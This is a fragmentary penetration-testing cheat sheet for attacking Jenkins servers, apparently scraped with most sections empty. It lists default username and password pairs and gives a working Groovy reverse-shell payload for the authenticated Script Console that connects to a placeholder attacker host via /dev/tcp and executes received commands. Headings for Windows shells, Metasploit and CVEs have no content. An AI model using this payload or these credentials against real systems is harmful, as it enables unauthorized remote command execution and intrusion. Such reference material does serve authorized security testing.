Jenkins
Discovery
Default Credentials
admin:admin
admin:password
jenkins:jenkinsScript Console RCE (Authenticated)
Linux Reverse Shell (Groovy)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Linux - Alternative
Windows Command Execution
Windows Reverse Shell (Groovy)
Metasploit
CVEs
CVE
Description
Last updated